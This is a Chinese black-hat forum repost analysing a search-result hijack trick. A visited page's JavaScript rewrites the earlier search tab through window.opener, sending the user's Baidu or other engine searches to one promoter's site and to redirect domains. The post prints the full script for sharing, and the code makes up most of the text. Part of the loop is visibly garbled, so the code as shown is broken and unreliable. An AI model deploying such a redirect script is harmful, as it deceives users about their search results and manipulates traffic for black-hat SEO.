来自:黑帽网
链接:http://bbs.cnblackhat.com/thread-9218-1-1.html
(点击尾部阅读原文前往)
百度搜索关键词点击后自动更换替换掉原有搜索结果分析(好几年前了,还是有很多人在用)
这个技术的话不是什么难的技术,不懂得人说百度被劫持了。其实只不过是本地执行了个js的脚本替换了下搜索结果而已。没什么大惊小怪。而且这种站点只能做黑帽。做白帽的用这种技术,百度发现会直接屏蔽掉这个站点。
下面看分析:
1、正常搜索一个关键词注意我们的网站地址!
![]()
2、点进去这个关键词url之后的网站。
![]()
3、切换到之前的选项卡里面,查看下地址框!
![]()
本地百度被替换掉了。这就是所谓的劫持。其实是本地浏览器被更改了。
4、我们分析下这个网站的源码:
![]()
不难发现有个特殊的javascript 的。而且不正常的东西。
5、点进去看下就会知道原因了。代码都在里面。
![]()
代码我备注一份吧。留着大家分享下。
var eg=[["www.google.com.hk/","&safe=strict&sitesearch=","",""],["www.google.com.tw/","&safe=strict&sitesearch=","",""],["www.google.com/","&safe=strict&sitesearch=","",""],["209.116.186.217/","&safe=strict&sitesearch=","",""],["www.baidu.com/","&ct=2097152&tn=0051&si=","baidu","baidu.com"],["www.haosou.com/","&rg=1&site=","haosou","haosou.com"],["cn.bing.com/","&rg=1&site=","",""],["sg.search.yahoo.com/","&site=","",""],["www.youdao.com/","&site=","",""],["www.sogou.com/","&site=","sogou","sogou.com"],["www.soso.com/","&site=","",""]];
var p=undefined;
try{if(window.opener)
{p=window.opener.location.href.toLowerCase();}
}
catch(e){}if(!p){p=document.referrer.toLowerCase();}
for(i=0;i0)
{var t=p+eg[i][1]+"www.fzleim.com";
if(eg[i][0]=="www.baidu.com/")
{var arr = /&wd\=.*/.exec(p);
var keyword='';
if(arr!=null && arr.length>0){keyword = arr[0].replace("&wd=","")};
t='http://www.baidu.com/s?ct=2097152&ie=UTF-8&cl=3&wd='+ keyword +'&si=www.fzleim.com'};
var jump_value = '';
if(document.getElementsByTagName('meta')['jump_key']!=undefined)
{jump_value = document.getElementsByTagName('meta')['jump_key'].getAttribute('content')}if(jump_value==undefined || jump_value==null){jump_value = ''}
if(eg[i][2].length>0){t='http://'+eg[i][3]+'.cnlanshan.com/url/www_fzleim_com/' + eg[i][2] + '/'+ jump_value}window.opener.location.href=t;break;}};
}
●
本文编号1868,以后想阅读这篇文章直接输入
1868
即可。
●本文分类“
黑客
”
,
搜索分类名可以获得相关文章。
●输入m可以获取到文章目录
